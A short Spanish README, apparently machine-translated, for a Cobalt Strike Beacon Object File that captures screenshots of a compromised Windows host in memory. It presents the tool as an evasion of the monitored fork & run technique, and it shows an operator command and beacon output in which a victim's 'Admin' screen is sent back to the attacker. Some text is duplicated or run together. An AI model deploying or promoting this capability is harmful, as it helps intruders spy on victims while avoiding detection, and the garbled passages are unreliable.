
Una capacidad alternativa de captura de pantalla para Cobalt Strike que utiliza WinAPI y no realiza un fork & run. Captura de pantalla descargada en memoria.
Una capacidad alternativa de captura de pantalla para Cobalt Strike que usa WinAPI y no realiza un fork & run. Captura de pantalla descargada en memoria.
make0: capturar pantalla completa (PID = 0) PID específico: capturar PID específico (¡funciona incluso cuando está minimizado!)
screenshot_bof sin argumentos mostrará un diálogo GUIbeacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
Cobalt Strike utiliza una técnica conocida como fork & run para muchas de sus capacidades post-explotación, incluido el comando screenshot. Si bien este comportamiento proporciona estabilidad, ahora es bien conocido y muy monitoreado. Este BOF está diseñado para proporcionar una versión más segura desde el punto de vista de OPSEC de la capacidad de captura de pantalla.
el descargo de responsabilidad habitual aquí, no soy responsable de ningún crimen contra la humanidad que pueda cometer o guerra nuclear que pueda causar usando este fragmento de código mal escrito.